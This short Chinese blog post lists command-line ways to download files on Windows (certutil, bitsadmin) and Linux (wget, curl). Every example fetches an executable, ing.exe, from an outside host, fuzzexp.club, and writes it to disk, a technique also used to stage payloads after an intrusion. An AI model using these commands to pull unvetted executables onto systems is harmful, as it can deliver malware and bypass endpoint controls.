Win/Linux 常用下载命令

Win/

 

certutil

--用于备份证书服务管理,支持xp-win10

certutil  -urlcache  -split  -f   https://fuzzexp.club/ing.exe d:\ing.exe

 

bitsadmin

--bitsadmin是windows 后台智能传输服务的一个工具,windows 的自动更新,补丁之类的下载就是用这个工具来实现的。

bitsadmin /rawreturn /transfer getfile https://fuzzexp.club/ing.exe d:\ing.exe

 

Linux/

 

wget

--wget命令用来从指定的URL下载文件
wget http://fuzzexp.club/ing.exe /tmp/ing.exe

 

curl
--在Linux中curl是一个利用URL规则在命令行下工作的文件传输工具
curl -o /tmp/ing.exe http://fuzzexp.club/ing.exe

posted @ 2017-08-10 12:58  航子er  阅读(505)  评论(0编辑  收藏  举报